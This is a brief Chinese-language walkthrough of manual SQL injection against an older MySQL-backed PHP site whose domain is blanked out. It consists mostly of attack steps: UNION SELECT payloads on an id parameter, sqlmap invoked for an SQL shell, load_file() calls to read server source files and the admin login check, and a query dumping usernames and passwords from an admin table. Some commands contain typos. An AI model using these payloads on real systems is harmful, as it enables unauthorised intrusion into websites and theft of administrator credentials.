Mysql5.0以下 手工注入

order by 20

 

www. .com/product/introduction.php?id=-65 UNION SELECT user(),2

 

www. .com/product/introduction.php?id=-65 UNION SELECT @@versions,2

报错

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/webroot/cw/product/introduction.php on line 71

使用sqlmap 将/home/webroot/cw/product/introduction.php带入

sqlmap -u "" --sql-sehll

select load_file('/home/webroot/cw/product/introduction.php')      查看introduction.php的源码

依次类推，可以找出更多的文件路径

找出管理登录目录

select load_file('/home/webroot/cw/check.php')

查找管理员表，列

select user,pwd from admin;